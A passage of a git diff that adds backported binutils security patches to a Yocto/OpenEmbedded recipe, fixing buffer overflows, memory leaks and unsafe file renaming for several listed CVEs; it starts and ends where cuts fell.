+@@ -4760,7 +4772,7 @@ strip_main (int argc, char *argv[])
+ 
+       if (output_file == NULL
+ 	  || filename_cmp (argv[i], output_file) == 0)
+-	tmpname = make_tempname (argv[i]);
++	tmpname = make_tempname (argv[i], &tmpfd);
+       else
+ 	tmpname = output_file;
+ 
+@@ -4773,15 +4785,13 @@ strip_main (int argc, char *argv[])
+ 	}
+ 
+       status = 0;
+-      copy_file (argv[i], tmpname, input_target, output_target, NULL);
++      copy_file (argv[i], tmpname, tmpfd, input_target, output_target, NULL);
+       if (status == 0)
+ 	{
+-	  if (preserve_dates)
+-	    set_times (tmpname, &statbuf);
+ 	  if (output_file != tmpname)
+ 	    status = (smart_rename (tmpname,
+ 				    output_file ? output_file : argv[i],
+-				    preserve_dates) != 0);
++				    preserve_dates ? &statbuf : NULL) != 0);
+ 	  if (status == 0)
+ 	    status = hold_status;
+ 	}
+@@ -4993,7 +5003,7 @@ copy_main (int argc, char *argv[])
+   bfd_boolean formats_info = FALSE;
+   bfd_boolean use_globalize = FALSE;
+   bfd_boolean use_keep_global = FALSE;
+-  int c;
++  int c, tmpfd = -1;
+   struct stat statbuf;
+   const bfd_arch_info_type *input_arch = NULL;
+ 
+@@ -5839,7 +5849,7 @@ copy_main (int argc, char *argv[])
+      are the same, then create a temp and rename the result into the input.  */
+   if (output_filename == NULL
+       || filename_cmp (input_filename, output_filename) == 0)
+-    tmpname = make_tempname (input_filename);
++    tmpname = make_tempname (input_filename, &tmpfd);
+   else
+     tmpname = output_filename;
+ 
+@@ -5847,14 +5857,13 @@ copy_main (int argc, char *argv[])
+     fatal (_("warning: could not create temporary file whilst copying '%s', (error: %s)"),
+ 	   input_filename, strerror (errno));
+ 
+-  copy_file (input_filename, tmpname, input_target, output_target, input_arch);
++  copy_file (input_filename, tmpname, tmpfd, input_target, output_target,
++	     input_arch);
+   if (status == 0)
+     {
+-      if (preserve_dates)
+-	set_times (tmpname, &statbuf);
+       if (tmpname != output_filename)
+ 	status = (smart_rename (tmpname, input_filename,
+-				preserve_dates) != 0);
++				preserve_dates ? &statbuf : NULL) != 0);
+     }
+   else
+     unlink_if_ordinary (tmpname);
+diff --git a/binutils/rename.c b/binutils/rename.c
+index bf3b68d0462..07d44d0f314 100644
+--- a/binutils/rename.c
++++ b/binutils/rename.c
+@@ -24,14 +24,9 @@
+ 
+ #ifdef HAVE_GOOD_UTIME_H
+ #include <utime.h>
+-#else /* ! HAVE_GOOD_UTIME_H */
+-#ifdef HAVE_UTIMES
++#elif defined HAVE_UTIMES
+ #include <sys/time.h>
+-#endif /* HAVE_UTIMES */
+-#endif /* ! HAVE_GOOD_UTIME_H */
+-
+-#if ! defined (_WIN32) || defined (__CYGWIN32__)
+-static int simple_copy (const char *, const char *);
++#endif
+ 
+ /* The number of bytes to copy at once.  */
+ #define COPY_BUF 8192
+@@ -82,7 +77,6 @@ simple_copy (const char *from, const char *to)
+     }
+   return 0;
+ }
+-#endif /* __CYGWIN32__ or not _WIN32 */
+ 
+ /* Set the times of the file DESTINATION to be the same as those in
+    STATBUF.  */
+@@ -91,122 +85,52 @@ void
+ set_times (const char *destination, const struct stat *statbuf)
+ {
+   int result;
+-
+-  {
+ #ifdef HAVE_GOOD_UTIME_H
+-    struct utimbuf tb;
+-
+-    tb.actime = statbuf->st_atime;
+-    tb.modtime = statbuf->st_mtime;
+-    result = utime (destination, &tb);
+-#else /* ! HAVE_GOOD_UTIME_H */
+-#ifndef HAVE_UTIMES
+-    long tb[2];
+-
+-    tb[0] = statbuf->st_atime;
+-    tb[1] = statbuf->st_mtime;
+-    result = utime (destination, tb);
+-#else /* HAVE_UTIMES */
+-    struct timeval tv[2];
+-
+-    tv[0].tv_sec = statbuf->st_atime;
+-    tv[0].tv_usec = 0;
+-    tv[1].tv_sec = statbuf->st_mtime;
+-    tv[1].tv_usec = 0;
+-    result = utimes (destination, tv);
+-#endif /* HAVE_UTIMES */
+-#endif /* ! HAVE_GOOD_UTIME_H */
+-  }
++  struct utimbuf tb;
++
++  tb.actime = statbuf->st_atime;
++  tb.modtime = statbuf->st_mtime;
++  result = utime (destination, &tb);
++#elif defined HAVE_UTIMES
++  struct timeval tv[2];
++
++  tv[0].tv_sec = statbuf->st_atime;
++  tv[0].tv_usec = 0;
++  tv[1].tv_sec = statbuf->st_mtime;
++  tv[1].tv_usec = 0;
++  result = utimes (destination, tv);
++#else
++  long tb[2];
++
++  tb[0] = statbuf->st_atime;
++  tb[1] = statbuf->st_mtime;
++  result = utime (destination, tb);
++#endif
+ 
+   if (result != 0)
+     non_fatal (_("%s: cannot set time: %s"), destination, strerror (errno));
+ }
+ 
+-#ifndef S_ISLNK
+-#ifdef S_IFLNK
+-#define S_ISLNK(m) (((m) & S_IFMT) == S_IFLNK)
+-#else
+-#define S_ISLNK(m) 0
+-#define lstat stat
+-#endif
+-#endif
+-
+-/* Rename FROM to TO, copying if TO is a link.
+-   Return 0 if ok, -1 if error.  */
++/* Copy FROM to TO.  TARGET_STAT has the file status that, if non-NULL,
++   is used to fix up timestamps.  Return 0 if ok, -1 if error.
++   At one time this function renamed files, but file permissions are
++   tricky to update given the number of different schemes used by
++   various systems.  So now we just copy.  */
+ 
+ int
+-smart_rename (const char *from, const char *to, int preserve_dates ATTRIBUTE_UNUSED)
++smart_rename (const char *from, const char *to,
++	      struct stat *target_stat)
+ {
+-  bfd_boolean exists;
+-  struct stat s;
+-  int ret = 0;
+-
+-  exists = lstat (to, &s) == 0;
+-
+-#if defined (_WIN32) && !defined (__CYGWIN32__)
+-  /* Win32, unlike unix, will not erase `to' in `rename(from, to)' but
+-     fail instead.  Also, chown is not present.  */
++  int ret;
+ 
+-  if (exists)
+-    remove (to);
+-
+-  ret = rename (from, to);
++  ret = simple_copy (from, to);
+   if (ret != 0)
+-    {
+-      /* We have to clean up here.  */
+-      non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
+-      unlink (from);
+-    }
+-#else
+-  /* Use rename only if TO is not a symbolic link and has
+-     only one hard link, and we have permission to write to it.  */
+-  if (! exists
+-      || (!S_ISLNK (s.st_mode)
+-	  && S_ISREG (s.st_mode)
+-	  && (s.st_mode & S_IWUSR)
+-	  && s.st_nlink == 1)
+-      )
+-    {
+-      ret = rename (from, to);
+-      if (ret == 0)
+-	{
+-	  if (exists)
+-	    {
+-	      /* Try to preserve the permission bits and ownership of
+-		 TO.  First get the mode right except for the setuid
+-		 bit.  Then change the ownership.  Then fix the setuid
+-		 bit.  We do the chmod before the chown because if the
+-		 chown succeeds, and we are a normal user, we won't be
+-		 able to do the chmod afterward.  We don't bother to
+-		 fix the setuid bit first because that might introduce
+-		 a fleeting security problem, and because the chown
+-		 will clear the setuid bit anyhow.  We only fix the
+-		 setuid bit if the chown succeeds, because we don't
+-		 want to introduce an unexpected setuid file owned by
+-		 the user running objcopy.  */
+-	      chmod (to, s.st_mode & 0777);
+-	      if (chown (to, s.st_uid, s.st_gid) >= 0)
+-		chmod (to, s.st_mode & 07777);
+-	    }
+-	}
+-      else
+-	{
+-	  /* We have to clean up here.  */
+-	  non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
+-	  unlink (from);
+-	}
+-    }
+-  else
+-    {
+-      ret = simple_copy (from, to);
+-      if (ret != 0)
+-	non_fatal (_("unable to copy file '%s'; reason: %s"), to, strerror (errno));
++    non_fatal (_("unable to copy file '%s'; reason: %s"),
++	       to, strerror (errno));
+ 
+-      if (preserve_dates)
+-	set_times (to, &s);
+-      unlink (from);
+-    }
+-#endif /* _WIN32 && !__CYGWIN32__ */
++  if (target_stat != NULL)
++    set_times (to, target_stat);
++  unlink (from);
+ 
+   return ret;
+ }
+-- 
+2.17.1
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
new file mode 100644
index 0000000000..1502d03f43
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
@@ -0,0 +1,83 @@
+From 647cebce12a6b0a26960220caff96ff38978cf24 Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Thu, 26 Nov 2020 17:08:33 +0000
+Subject: [PATCH] Prevent a memory allocation failure when parsing corrupt
+ DWARF debug sections.
+
+	PR 26946
+	* dwarf2.c (read_section): Check for debug sections with excessive
+	sizes.
+
+
+Upstream-Status: Backport [
+https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=647cebce12a6b0a26960220caff96ff38978cf24
+]
+CVE: CVE-2021-3487
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ bfd/dwarf2.c  | 25 +++++++++++++++++++------
+ 1 files changed, 25 insertions(+), 6 deletions(-)
+
+diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
+index 977bf43a6a1..8bbfc81d3e7 100644
+--- a/bfd/dwarf2.c
++++ b/bfd/dwarf2.c
+@@ -531,22 +531,24 @@ read_section (bfd *	      abfd,
+ 	      bfd_byte **     section_buffer,
+ 	      bfd_size_type * section_size)
+ {
+-  asection *msec;
+   const char *section_name = sec->uncompressed_name;
+   bfd_byte *contents = *section_buffer;
+-  bfd_size_type amt;
+ 
+   /* The section may have already been read.  */
+   if (contents == NULL)
+     {
++      bfd_size_type amt;
++      asection *msec;
++      ufile_ptr filesize;
++
+       msec = bfd_get_section_by_name (abfd, section_name);
+-      if (! msec)
++      if (msec == NULL)
+ 	{
+ 	  section_name = sec->compressed_name;
+ 	  if (section_name != NULL)
+ 	    msec = bfd_get_section_by_name (abfd, section_name);
+ 	}
+-      if (! msec)
++      if (msec == NULL)
+ 	{
+ 	  _bfd_error_handler (_("DWARF error: can't find %s section."),
+ 			      sec->uncompressed_name);
+@@ -554,12 +556,23 @@ read_section (bfd *	      abfd,
+ 	  return FALSE;
+ 	}
+ 
+-      *section_size = msec->rawsize ? msec->rawsize : msec->size;
++      amt = bfd_get_section_limit_octets (abfd, msec);
++      filesize = bfd_get_file_size (abfd);
++      if (amt >= filesize)
++	{
++	  /* PR 26946 */
++	  _bfd_error_handler (_("DWARF error: section %s is larger than its filesize! (0x%lx vs 0x%lx)"),
++			      section_name, (long) amt, (long) filesize);
++	  bfd_set_error (bfd_error_bad_value);
++	  return FALSE;
++	}
++      *section_size = amt;
+       /* Paranoia - alloc one extra so that we can make sure a string
+ 	 section is NUL terminated.  */
+-      amt = *section_size + 1;
++      amt += 1;
+       if (amt == 0)
+ 	{
++	  /* Paranoia - this should never happen.  */
+ 	  bfd_set_error (bfd_error_no_memory);
+ 	  return FALSE;
+ 	}
+-- 
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
new file mode 100644
index 0000000000..5f56dd7696
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
@@ -0,0 +1,183 @@
+From 1cfcf3004e1830f8fe9112cfcd15285508d2c2b7 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 11 Feb 2021 16:56:42 +1030
+Subject: [PATCH] PR27290, PR27293, PR27295, various avr objdump fixes
+
+Adds missing sanity checks for avr device info note, to avoid
+potential buffer overflows.  Uses bfd_malloc_and_get_section for
+sanity checking section size.
+
+        PR 27290
+        PR 27293
+        PR 27295
+        * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
+        Use bfd_malloc_and_get_section.
+        (elf32_avr_get_note_desc): Formatting.  Return descsz.  Sanity
+        check namesz.  Return NULL if descsz is too small.  Ensure
+        string table is terminated.
+        (elf32_avr_get_device_info): Formatting.  Add note_size param.
+        Sanity check note.
+        (elf32_avr_dump_mem_usage): Adjust to suit.
+
+Upstream-Status: Backport
+CVE: CVE-2021-3549
+Signed-of-by: Armin Kuster <akuster@mvista.com>
+
+---
+diff --git a/binutils/ChangeLog b/binutils/ChangeLog
+index 1e9a96c9bb6..02e5019204e 100644
+--- a/binutils/ChangeLog
++++ b/binutils/ChangeLog
+@@ -1,3 +1,17 @@
++2021-02-11  Alan Modra  <amodra@gmail.com>
++
++	   PR 27290
++	   PR 27293
++	   PR 27295
++	   * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
++	   Use bfd_malloc_and_get_section.
++	   (elf32_avr_get_note_desc): Formatting.  Return descsz.  Sanity
++	   check namesz.  Return NULL if descsz is too small.  Ensure
++	   string table is terminated.
++	   (elf32_avr_get_device_info): Formatting.  Add note_size param.
++	   Sanity check note.
++	   (elf32_avr_dump_mem_usage): Adjust to suit.
++
+ 2020-03-25  H.J. Lu  <hongjiu.lu@intel.com>
+ 
+ 	* ar.c (main): Update bfd_plugin_set_program_name call.
+diff --git a/binutils/od-elf32_avr.c b/binutils/od-elf32_avr.c
+index 5ec99957fe9..1d32bce918e 100644
+--- a/binutils/od-elf32_avr.c
++++ b/binutils/od-elf32_avr.c
+@@ -77,23 +77,29 @@ elf32_avr_filter (bfd *abfd)
+   return bfd_get_flavour (abfd) == bfd_target_elf_flavour;
+ }
+ 
+-static char*
++static char *
+ elf32_avr_get_note_section_contents (bfd *abfd, bfd_size_type *size)
+ {
+   asection *section;
++  bfd_byte *contents;
+ 
+-  if ((section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo")) == NULL)
++  section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo");
++  if (section == NULL)
+     return NULL;
+ 
+-  *size = bfd_section_size (section);
+-  char *contents = (char *) xmalloc (*size);
+-  bfd_get_section_contents (abfd, section, contents, 0, *size);
++  if (!bfd_malloc_and_get_section (abfd, section, &contents))
++    {
++      free (contents);
++      contents = NULL;
++    }
+ 
+-  return contents;
++  *size = bfd_section_size (section);
++  return (char *) contents;
+ }
+ 
+-static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
+-        bfd_size_type size)
++static char *
++elf32_avr_get_note_desc (bfd *abfd, char *contents, bfd_size_type size,
++			 bfd_size_type *descsz)
+ {
+   Elf_External_Note *xnp = (Elf_External_Note *) contents;
+   Elf_Internal_Note in;
+@@ -107,42 +113,54 @@ static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
+   if (in.namesz > contents - in.namedata + size)
+     return NULL;
+ 
++  if (in.namesz != 4 || strcmp (in.namedata, "AVR") != 0)
++    return NULL;
++
+   in.descsz = bfd_get_32 (abfd, xnp->descsz);
+   in.descdata = in.namedata + align_power (in.namesz, 2);
+-  if (in.descsz != 0
+-        && (in.descdata >= contents + size
+-            || in.descsz > contents - in.descdata + size))
++  if (in.descsz < 6 * sizeof (uint32_t)
++      || in.descdata >= contents + size
++      || in.descsz > contents - in.descdata + size)
+     return NULL;
+ 
+-  if (strcmp (in.namedata, "AVR") != 0)
+-    return NULL;
++  /* If the note has a string table, ensure it is 0 terminated.  */
++  if (in.descsz > 8 * sizeof (uint32_t))
++    in.descdata[in.descsz - 1] = 0;
+ 
++  *descsz = in.descsz;
+   return in.descdata;
+ }
+ 
+ static void
+ elf32_avr_get_device_info (bfd *abfd, char *description,
+-        deviceinfo *device)
++			   bfd_size_type desc_size, deviceinfo *device)
+ {
+   if (description == NULL)
+     return;
+ 
+   const bfd_size_type memory_sizes = 6;
+ 
+-  memcpy (device, description, memory_sizes * sizeof(uint32_t));
+-  device->name = NULL;
++  memcpy (device, description, memory_sizes * sizeof (uint32_t));
++  desc_size -= memory_sizes * sizeof (uint32_t);
++  if (desc_size < 8)
++    return;
+ 
+-  uint32_t *stroffset_table = ((uint32_t *) description) + memory_sizes;
++  uint32_t *stroffset_table = (uint32_t *) description + memory_sizes;
+   bfd_size_type stroffset_table_size = bfd_get_32 (abfd, stroffset_table);
+-  char *str_table = ((char *) stroffset_table) + stroffset_table_size;
+ 
+   /* If the only content is the size itself, there's nothing in the table */
+-  if (stroffset_table_size == 4)
++  if (stroffset_table_size < 8)
+     return;
++  if (desc_size <= stroffset_table_size)
++    return;
++  desc_size -= stroffset_table_size;
+ 
+   /* First entry is the device name index. */
+   uint32_t device_name_index = bfd_get_32 (abfd, stroffset_table + 1);
++  if (device_name_index >= desc_size)
++    return;
+ 
++  char *str_table = (char *) stroffset_table + stroffset_table_size;
+   device->name = str_table + device_name_index;
+ }
+ 
+@@ -183,7 +201,7 @@ static void
+ elf32_avr_dump_mem_usage (bfd *abfd)
+ {
+   char *description = NULL;
+-  bfd_size_type note_section_size = 0;
++  bfd_size_type sec_size, desc_size;
+ 
+   deviceinfo device = { 0, 0, 0, 0, 0, 0, NULL };
+   device.name = "Unknown";
+@@ -192,13 +210,13 @@ elf32_avr_dump_mem_usage (bfd *abfd)
+   bfd_size_type text_usage = 0;
+   bfd_size_type eeprom_usage = 0;
+ 
+-  char *contents = elf32_avr_get_note_section_contents (abfd,
+-    &note_section_size);
++  char *contents = elf32_avr_get_note_section_contents (abfd, &sec_size);
+ 
+   if (contents != NULL)
+     {
+-      description = elf32_avr_get_note_desc (abfd, contents, note_section_size);
+-      elf32_avr_get_device_info (abfd, description, &device);
++      description = elf32_avr_get_note_desc (abfd, contents, sec_size,
++					     &desc_size);
++      elf32_avr_get_device_info (abfd, description, desc_size, &device);
+     }
+ 
+   elf32_avr_get_memory_usage (abfd, &text_usage, &data_usage,
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
new file mode 100644
index 0000000000..2addf5139e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
@@ -0,0 +1,35 @@
+From 46322722ad40ac1a75672ae0f62f4969195f1368 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 20 Jan 2022 13:58:38 +1030
+Subject: [PATCH] PR28753, buffer overflow in read_section_stabs_debugging_info
+
+	PR 28753
+	* rddbg.c (read_section_stabs_debugging_info): Don't read past
+	end of section when concatentating stab strings.
+
+CVE: CVE-2021-46174
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=cad4d6b91e97]
+
+(cherry picked from commit 085b299b71721e15f5c5c5344dc3e4e4536dadba)
+(cherry picked from commit cad4d6b91e97b6962807d33c04ed7e7797788438)
+Signed-off-by: poojitha adireddy <pooadire@cisco.com>
+---
+ binutils/rddbg.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/binutils/rddbg.c b/binutils/rddbg.c
+index 72e934055b5..5e76d94a3c4 100644
+--- a/binutils/rddbg.c
++++ b/binutils/rddbg.c
+@@ -207,7 +207,7 @@ read_section_stabs_debugging_info (bfd *abfd, asymbol **syms, long symcount,
+ 		     an attempt to read the byte before 'strings' would occur.  */
+ 		  while ((len = strlen (s)) > 0
+ 			 && s[len  - 1] == '\\'
+-			 && stab + 12 < stabs + stabsize)
++			 && stab + 16 <= stabs + stabsize)
+ 		    {
+ 		      char *p;
+ 
+-- 
+2.23.1
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
new file mode 100644
index 0000000000..102d65f8a6
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
@@ -0,0 +1,37 @@
+From ef186fe54aa6d281a3ff8a9528417e5cc614c797 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Sat, 13 Aug 2022 15:32:47 +0930
+Subject: [PATCH] PR29482 - strip: heap-buffer-overflow
+
+	PR 29482
+	* coffcode.h (coff_set_section_contents): Sanity check _LIB.
+
+CVE: CVE-2022-38533
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=ef186fe54aa6d281a3ff8a9528417e5cc614c797]
+
+Signed-off-by: Florin Diaconescu <florin.diaconescu009@gmail.com>
+
+---
+ bfd/coffcode.h | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/bfd/coffcode.h b/bfd/coffcode.h
+index dec2e9c6370..75c18d88602 100644
+--- a/bfd/coffcode.h
++++ b/bfd/coffcode.h
+@@ -4170,10 +4170,13 @@ coff_set_section_contents (bfd * abfd,
+ 
+ 	rec = (bfd_byte *) location;
+ 	recend = rec + count;
+-	while (rec < recend)
++	while (recend - rec >= 4)
+ 	  {
++	    size_t len = bfd_get_32 (abfd, rec);
++	    if (len == 0 || len > (size_t) (recend - rec) / 4)
++	      break;
++	    rec += len * 4;
+ 	    ++section->lma;
+-	    rec += bfd_get_32 (abfd, rec) * 4;
+ 	  }
+ 
+ 	BFD_ASSERT (rec == recend);
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
new file mode 100644
index 0000000000..ddb564bc8c
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
@@ -0,0 +1,32 @@
+From 0ebc886149c22aceaf8ed74267821a59ca9d03eb Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Jun 2022 09:00:41 +0930
+Subject: [PATCH] PR29254, memory leak in stab_demangle_v3_arg
+
+	PR 29254
+	* stabs.c (stab_demangle_v3_arg): Free dt on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0ebc886149c22aceaf8ed74267821a59ca9d03eb]
+CVE: CVE-2022-47007
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/stabs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 2b5241637c1..796ff85b86a 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -5476,7 +5476,10 @@
+ 					  dc->u.s_binary.right,
+ 					  &varargs);
+ 	if (pargs == NULL)
+-	  return NULL;
++         {
++           free (dt);
++           return NULL;
++         }
+ 
+ 	return debug_make_function_type (dhandle, dt, pargs, varargs);
+       }
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
new file mode 100644
index 0000000000..9527390ccf
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
@@ -0,0 +1,64 @@
+From d6e1d48c83b165c129cb0aa78905f7ca80a1f682 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Jun 2022 09:13:38 +0930
+Subject: [PATCH] PR29255, memory leak in make_tempdir
+
+	PR 29255
+	* bucomm.c (make_tempdir, make_tempname): Free template on all
+	failure paths.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=d6e1d48c83b165c129cb0aa78905f7ca80a1f682]
+CVE: CVE-2022-47008
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/bucomm.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+diff --git a/binutils/bucomm.c b/binutils/bucomm.c
+index fdc2209df9c..4395cb9f7f5 100644
+--- a/binutils/bucomm.c
++++ b/binutils/bucomm.c
+@@ -542,8 +542,9 @@
+ #else
+   tmpname = mktemp (tmpname);
+   if (tmpname == NULL)
+-    return NULL;
+-  fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
++    fd = -1;
++  else
++    fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
+ #endif
+   if (fd == -1)
+     {
+@@ -561,22 +562,23 @@
+ make_tempdir (const char *filename)
+ {
+   char *tmpname = template_in_dir (filename);
++  char *ret;
+ 
+ #ifdef HAVE_MKDTEMP
+-  return mkdtemp (tmpname);
++  ret = mkdtemp (tmpname);
+ #else
+-  tmpname = mktemp (tmpname);
+-  if (tmpname == NULL)
+-    return NULL;
++  ret = mktemp (tmpname);
+ #if defined (_WIN32) && !defined (__CYGWIN32__)
+   if (mkdir (tmpname) != 0)
+-    return NULL;
++    ret = NULL;
+ #else
+   if (mkdir (tmpname, 0700) != 0)
+-    return NULL;
++    ret = NULL;
+ #endif
+-  return tmpname;
+ #endif
++  if (ret == NULL)
++    free (tmpname);
++  return ret;
+ }
+ 
+ /* Parse a string into a VMA, with a fatal error if it can't be
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
new file mode 100644
index 0000000000..d831ed4756
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
@@ -0,0 +1,34 @@
+From 0d02e70b197c786f26175b9a73f94e01d14abdab Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 20 Jun 2022 10:39:31 +0930
+Subject: [PATCH] PR29262, memory leak in pr_function_type
+
+	PR 29262
+	* prdbg.c (pr_function_type): Free "s" on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0d02e70b197c786f26175b9a73f94e01d14abdab]
+CVE: CVE-2022-47010
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/prdbg.c | 7 ++-----
+ 1 file changed, 2 insertions(+), 5 deletions(-)
+
+diff --git a/binutils/prdbg.c b/binutils/prdbg.c
+index c1e41628d26..bb42a5b6c2d 100644
+--- a/binutils/prdbg.c
++++ b/binutils/prdbg.c
+@@ -778,12 +778,9 @@
+ 
+   strcat (s, ")");
+ 
+-  if (! substitute_type (info, s))
+-    return FALSE;
+-
++  bfd_boolean ret = substitute_type (info, s);
+   free (s);
+-
+-  return TRUE;
++  return ret;
+ }
+ 
+ /* Turn the top type on the stack into a reference to that type.  */
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
new file mode 100644
index 0000000000..250756bd38
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
@@ -0,0 +1,31 @@
+From 8a24927bc8dbf6beac2000593b21235c3796dc35 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 20 Jun 2022 10:39:13 +0930
+Subject: [PATCH] PR29261, memory leak in parse_stab_struct_fields
+
+	PR 29261
+	* stabs.c (parse_stab_struct_fields): Free "fields" on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=8a24927bc8dbf6beac2000593b21235c3796dc35]
+CVE: CVE-2022-47011
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/stabs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 796ff85b86a..bf3f578cbcc 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -2368,7 +2368,10 @@
+ 
+       if (! parse_stab_one_struct_field (dhandle, info, pp, p, fields + c,
+ 					 staticsp, p_end))
+-	return FALSE;
++       {
++         free (fields);
++         return FALSE;
++       }
+ 
+       ++c;
+     }
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
new file mode 100644
index 0000000000..101a4cdb4e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
@@ -0,0 +1,57 @@
+From 3d3af4ba39e892b1c544d667ca241846bc3df386 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Sun, 4 Dec 2022 22:15:40 +1030
+Subject: [PATCH] PR29846, segmentation fault in objdump.c compare_symbols
+
+Fixes a fuzzed object file problem where plt relocs were manipulated
+in such a way that two synthetic symbols were generated at the same
+plt location.  Won't occur in real object files.
+
+	PR 29846
+	PR 20337
+	* objdump.c (compare_symbols): Test symbol flags to exclude
+	section and synthetic symbols before attempting to check flavour.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff;h=3d3af4ba39e892b1c544d667ca241846bc3df386]
+CVE: CVE-2022-47695
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/objdump.c | 23 ++++++++++-------------
+ 1 file changed, 10 insertions(+), 13 deletions(-)
+
+diff --git a/binutils/objdump.c b/binutils/objdump.c
+index e8481b2d928..d95c8b68bf0 100644
+--- a/binutils/objdump.c
++++ b/binutils/objdump.c
+@@ -935,20 +935,17 @@
+ 	return 1;
+     }
+ 
+-  if (bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour
++  /* Sort larger size ELF symbols before smaller.  See PR20337.  */
++  bfd_vma asz = 0;
++  if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
++      && bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour)
++    asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
++  bfd_vma bsz = 0;
++  if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
+       && bfd_get_flavour (bfd_asymbol_bfd (b)) == bfd_target_elf_flavour)
+-    {
+-      bfd_vma asz, bsz;
+-
+-      asz = 0;
+-      if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
+-	asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
+-      bsz = 0;
